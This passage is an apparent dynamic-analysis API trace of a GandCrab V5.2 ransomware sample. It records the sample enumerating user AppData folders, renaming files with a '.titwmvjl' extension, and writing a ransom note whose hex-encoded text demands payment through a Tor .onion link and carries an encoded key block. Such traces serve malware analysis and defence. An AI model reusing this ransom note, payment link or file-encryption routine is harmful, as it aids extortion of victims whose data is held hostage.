lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a09d2ca4deb61a.lock" [0069.093] lstrlenW (lpString=".titwmvjl") returned 9 [0069.093] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a09d2ca4deb61a.lock") returned 54 [0069.093] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.093] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 63 [0069.093] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a09d2ca4deb61a.lock") returned 54 [0069.093] lstrlenW (lpString=".lock") returned 5 [0069.093] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.094] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.094] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.094] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.094] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0069.094] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0069.094] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0069.094] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="Local" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0069.094] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0069.094] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.094] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.095] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.095] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.095] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.095] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.095] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.095] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0069.095] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0069.095] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0069.095] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="LocalLow" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow" [0069.096] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow\\" [0069.096] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.096] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.096] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.096] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.096] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.096] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.096] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.097] FindNextFileW (in: hFindFile=0x5038f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0069.097] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0069.097] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0069.097] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="Roaming" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0069.097] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0069.097] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.097] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.097] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.097] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.098] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.098] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.098] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.098] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\\\TITWMVJL-DECRYPT.txt") returned 59 [0069.098] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0069.099] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x6